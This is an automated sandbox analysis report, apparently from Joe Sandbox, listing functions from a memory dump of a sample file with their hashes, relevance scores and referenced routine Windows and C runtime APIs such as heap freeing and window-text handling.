Instruction Fuzzy Hash:

Function 0036C030 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0036C030

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: aa04ef348d94ed95d4a4bd4bb96687a5bab38fa3ef686331591d062a64a0e677
Instruction ID: b72290ab9bd2e0d2d162447fa14772ff3b76a95e4a8f1881cfb039ff2f409018
Opcode Fuzzy Hash: aa04ef348d94ed95d4a4bd4bb96687a5bab38fa3ef686331591d062a64a0e677
Instruction Fuzzy Hash: 31A011B02022008F83028F38AE0820A3BACAA02380B08002AA80AC0030EA2080A0AA00

Function 003562CA Relevance: .8, Instructions: 829COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f8113f2fe17e1fe5adf28291dd6dc1f64d00099287cbfcd1ac5a0770544dab2
Instruction ID: 7a80786dc2bda6eeae4b43e4ee7d36cb70a5c38086fecdb55ab7f9d4fe031799
Opcode Fuzzy Hash: 5f8113f2fe17e1fe5adf28291dd6dc1f64d00099287cbfcd1ac5a0770544dab2
Instruction Fuzzy Hash: B86208716047849FCB26CF28C891AB9BBE1BF95305F49896DDCDA8B352D730E949CB10

Function 003577EF Relevance: .8, Instructions: 817COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb9617cfb9dcd5ed73515ceaa1cdae9c81077d575e7d9551ef57e855e6e5c47f
Instruction ID: b97e800b3fca268c4f84276e9dc42408aed74f1ae22a3f40dd949bf7a33c27b4
Opcode Fuzzy Hash: bb9617cfb9dcd5ed73515ceaa1cdae9c81077d575e7d9551ef57e855e6e5c47f
Instruction Fuzzy Hash: E762067160C3858FCB16CF28D8809B9BBE1BF95304F19896DEC9A8B356D730E949CB15

Function 0034F461 Relevance: .7, Instructions: 694COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07bf4a65aa449dff48fd2b0c9f6b18a690921bffffe8b35fa307a18f9ecacfdb
Instruction ID: b207cd156bd83c186505fb68a73fe4c3ed9d3060ce33fcb3eba278187a33bcb6
Opcode Fuzzy Hash: 07bf4a65aa449dff48fd2b0c9f6b18a690921bffffe8b35fa307a18f9ecacfdb
Instruction Fuzzy Hash: 2B523972A187018FC718CF19C891A6AF7E1FFCC304F498A2DE5959B255D334EA19CB86

Function 00357153 Relevance: .5, Instructions: 536COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ea4b0b5fb29f37934701be06495e47dcd92a3fdc39bf1433d27c883f1b5960c
Instruction ID: 56f90c0af4f83e3ccd8ddc741bde182d7fd3395bdf8a418d791c2114aa43dcd2
Opcode Fuzzy Hash: 2ea4b0b5fb29f37934701be06495e47dcd92a3fdc39bf1433d27c883f1b5960c
Instruction Fuzzy Hash: 6012D4B16187068FC71ACF28D490A79B7E1FF98305F10492EE996CB790E334E999CB45

Function 0034C426 Relevance: .5, Instructions: 454COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc52213d87f0fe5ba7c8a98b6f23247f5f9458348e995d3c6ecb41e3e561d7a1
Instruction ID: 99a786148aff33a0f804f36bbe88e9f0fc4423690043670a8bb073712859b520
Opcode Fuzzy Hash: fc52213d87f0fe5ba7c8a98b6f23247f5f9458348e995d3c6ecb41e3e561d7a1
Instruction Fuzzy Hash: 7CF1DE31A2A3019FC796CF28C48452ABBE5EFCA354F166A2EF485CB255D730E905CB52

Function 00356CDC Relevance: .3, Instructions: 343COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 0e1099366b18d8e0fbf1c4af999e44a72ebf67843374075e925825a1dc46961f
Instruction ID: e49effd3d0c0934dc132cc52fd599a8a099ba4ca0bea070430c36e53f5f6c3f8
Opcode Fuzzy Hash: 0e1099366b18d8e0fbf1c4af999e44a72ebf67843374075e925825a1dc46961f
Instruction Fuzzy Hash: 1DD1E5B1A083408FCB15CF28D941B5BBBE1BF89309F09456DEC899B362D774E909CB56

Function 0034E9B7 Relevance: .3, Instructions: 320COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e12df62da28306147b91847d9766a941e7f1f63db65df45727616bba50666de
Instruction ID: 3812cbb1f3ebecb3eb209adf4af3bd8036b5f6dbfef40601ee6eae9294aea3cf
Opcode Fuzzy Hash: 8e12df62da28306147b91847d9766a941e7f1f63db65df45727616bba50666de
Instruction Fuzzy Hash: 9FE13A755083948FC305CF29D89046ABFF0AF9A300F45499EF9D49B392C739EA19DB92

Function 00354088 Relevance: .3, Instructions: 270COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 099330c7f7ccdd417e25f555c4bfc52021962f4fe602807f6dd12a6fe714b0d5
Instruction ID: be2e3b7980e4598ffd6f6f07de7997a03a7fe3692ee139af24c724c5152b33d4
Opcode Fuzzy Hash: 099330c7f7ccdd417e25f555c4bfc52021962f4fe602807f6dd12a6fe714b0d5
Instruction Fuzzy Hash: C2917BB02047494BC72EEE64D891FBE77D8EB50309F10092CFD96CB291DA74A58DC752

Function 003543BF Relevance: .2, Instructions: 243COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
Instruction ID: 0ad0b638b602dadeea5ecb214d56bf4c84811fb4b231e85ffd607cc28aa8fe5b
Opcode Fuzzy Hash: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
Instruction Fuzzy Hash: 4E8136B17443464BDB2EDE68C891FBD37D4EB91309F000D2DED868F692EA6099CD8752

Function 003651C9 Relevance: .2, Instructions: 237COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa2cfac18b3f51af18225f278b4d606ce46bfb4a3018ff47e221ebdd4d0074be
Instruction ID: 72dc3de3d53d77471b4983c0f387791984b045bf2a2709195f78516f0f1a57dc
Opcode Fuzzy Hash: fa2cfac18b3f51af18225f278b4d606ce46bfb4a3018ff47e221ebdd4d0074be
Instruction Fuzzy Hash: 6B619B35A00F0857DA3B9A6898B57BE2398EB12B40F25CD3AE483DF78DD691DD428315

Function 00364F9A Relevance: .2, Instructions: 214COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
Instruction ID: 16e9579b6376f62911a6a9b8e2eda431a9a25bec88b8c202053cb49f9fe2f14e
Opcode Fuzzy Hash: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
Instruction Fuzzy Hash: 2F515961A04F4467DF375A688956BBF27C99B03300F19C939E883CF68EC615ED45C3A1

Function 0034EFE2 Relevance: .2, Instructions: 161COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 92ff1a2ce8fe3ca75bee8b9b31043c2b0485f938581aa50f10ce5115a6d073b1
Instruction ID: af8e964d2df2804b34183b95a1c40896effc8c9574ee43260e62ebfe4aac7b2d
Opcode Fuzzy Hash: 92ff1a2ce8fe3ca75bee8b9b31043c2b0485f938581aa50f10ce5115a6d073b1
Instruction Fuzzy Hash: 2E51AF715093D58ED713CF29C59046EBFE0AEDA314F4A09A9E4D95F243C221EA4ACB62

Function 003500B7 Relevance: .1, Instructions: 141COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 665ce4ed94d48a6504e9f9a76d95215c647eaa72c6af71519c72b813f2aacf19
Instruction ID: f9056645a70f080c57b61a3992ea30f82f9a4d9e76b50df4667117e06dc26a74
Opcode Fuzzy Hash: 665ce4ed94d48a6504e9f9a76d95215c647eaa72c6af71519c72b813f2aacf19
Instruction Fuzzy Hash: E451FFB1A087119FC748CF19D48055AF7E1FF88314F058A2EE899E3340D735EA59CB9A

Function 00353E0B Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
Instruction ID: e9f60a1795ecdfeffc6448e29ac5b3536039bed3210ba7987f4c6198d66d359d
Opcode Fuzzy Hash: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
Instruction Fuzzy Hash: 9F31E7B2A147468FCB19DF28C85156EBBE0FB95305F10452DE895CB741C735EA0ACB92

Function 0034E2E8 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 234COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 0034E30E

Part of subcall function 00344092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 003440A5

Part of subcall function 00351DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00381030,00000200,0034D928,00000000,?,00000050,00381030), ref: 00351DC4

_strlen.LIBCMT ref: 0034E32F
SetDlgItemTextW.USER32(?,0037E274,?), ref: 0034E38F
GetWindowRect.USER32(?,?), ref: 0034E3C9
GetClientRect.USER32(?,?), ref: 0034E3D5
GetWindowLongW.USER32(?,000000F0), ref: 0034E475
GetWindowRect.USER32(?,?), ref: 0034E4A2
SetWindowTextW.USER32(?,?), ref: 0034E4DB
GetSystemMetrics.USER32(00000008), ref: 0034E4E3
GetWindow.USER32(?,00000005), ref: 0034E4EE
GetWindowRect.USER32(00000000,?), ref: 0034E51B
GetWindow.USER32(00000000,00000002), ref: 0034E58D

Strings

CAPTION, xrefs: 0034E4BD
d, xrefs: 0034E3F5
$%s:, xrefs: 0034E302
t7, xrefs: 0034E34A

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
String ID: $%s:$CAPTION$d$t7
API String ID: 2407758923-1991621600
Opcode ID: 18f9d1fd3c64c4ce54ce000bdffe348c986c20f3646bbff11cd11a3eaef4cbae
Instruction ID: a220ab3c33462852b915c8e65666a621e9d5824f42b8c77fdb835d5a4decec2a
Opcode Fuzzy Hash: 18f9d1fd3c64c4ce54ce000bdffe348c986c20f3646bbff11cd11a3eaef4cbae
Instruction Fuzzy Hash: 08819F72208301AFD712DFA8CC89A6BBBEDFB89704F04491DFA849B250D634E9058B52

Function 0036CB22 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 0036CB66

Part of subcall function 0036C701: _free.LIBCMT ref: 0036C71E
Part of subcall function 0036C701: _free.LIBCMT ref: 0036C730
Part of subcall function 0036C701: _free.LIBCMT ref: 0036C742
Part of subcall function 0036C701: _free.LIBCMT ref: 0036C754
Part of subcall function 0036C701: _free.LIBCMT ref: 0036C766
Part of subcall function 0036C701: _free.LIBCMT ref: 0036C778
Part of subcall function 0036C701: _free.LIBCMT ref: 0036C78A
Part of subcall function 0036C701: _free.LIBCMT ref: 0036C79C
Part of subcall function 0036C701: _free.LIBCMT ref: 0036C7AE
Part of subcall function 0036C701: _free.LIBCMT ref: 0036C7C0
Part of subcall function 0036C701: _free.LIBCMT ref: 0036C7D2
Part of subcall function 0036C701: _free.LIBCMT ref: 0036C7E4
Part of subcall function 0036C701: _free.LIBCMT ref: 0036C7F6

_free.LIBCMT ref: 0036CB5B

Part of subcall function 00368DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0036C896,?,00000000,?,00000000,?,0036C8BD,?,00000007,?,?,0036CCBA,?), ref: 00368DE2
Part of subcall function 00368DCC: GetLastError.KERNEL32(?,?,0036C896,?,00000000,?,00000000,?,0036C8BD,?,00000007,?,?,0036CCBA,?,?), ref: 00368DF4

_free.LIBCMT ref: 0036CB7D
_free.LIBCMT ref: 0036CB92
_free.LIBCMT ref: 0036CB9D
_free.LIBCMT ref: 0036CBBF
_free.LIBCMT ref: 0036CBD2
_free.LIBCMT ref: 0036CBE0
_free.LIBCMT ref: 0036CBEB
_free.LIBCMT ref: 0036CC23
_free.LIBCMT ref: 0036CC2A
_free.LIBCMT ref: 0036CC47
_free.LIBCMT ref: 0036CC5F

Strings

h7, xrefs: 0036CC0E

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID: h7
API String ID: 161543041-3332920872
Opcode ID: e3b698fce86735a5ded76fb44a7284bd05ed84f70a0d053a5016a49e746c375f
Instruction ID: 82c7d28ebb0183588e74c77172ec1c8f19ba2f19f9d12b9282ac9a92cd3b68bd
Opcode Fuzzy Hash: e3b698fce86735a5ded76fb44a7284bd05ed84f70a0d053a5016a49e746c375f
Instruction Fuzzy Hash: 31318D316103459FEB22AB78D846B6AB7E9EF15310F11E529E198DB19ADF71EC40CB20

Function 003696F1 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00369705

Part of subcall function 00368DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0036C896,?,00000000,?,00000000,?,0036C8BD,?,00000007,?,?,0036CCBA,?), ref: 00368DE2
Part of subcall function 00368DCC: GetLastError.KERNEL32(?,?,0036C896,?,00000000,?,00000000,?,0036C8BD,?,00000007,?,?,0036CCBA,?,?), ref: 00368DF4

_free.LIBCMT ref: 00369711
_free.LIBCMT ref: 0036971C
_free.LIBCMT ref: 00369727
_free.LIBCMT ref: 00369732
_free.LIBCMT ref: 0036973D
_free.LIBCMT ref: 00369748
_free.LIBCMT ref: 00369753
_free.LIBCMT ref: 0036975E
_free.LIBCMT ref: 0036976C

Strings

0d7, xrefs: 003696FC

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID: 0d7
API String ID: 776569668-1644574510
Opcode ID: 737f6d7239cea15a6d4048e451792487672bddda8265548f31f65835fd33bafe
Instruction ID: dc2a1e1ea5fbf4d2340dab7a638c2259c982e6923181dc9025006e74819c3134
Opcode Fuzzy Hash: 737f6d7239cea15a6d4048e451792487672bddda8265548f31f65835fd33bafe
Instruction Fuzzy Hash: 6111C876110149BFCB02EF54C842DDD3BB9EF19350B5196A1FA088F276DE32DE509B94

Function 00359711 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 126memoryCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00359736
_wcslen.LIBCMT ref: 003597D6
GlobalAlloc.KERNEL32(00000040,?), ref: 003597E5
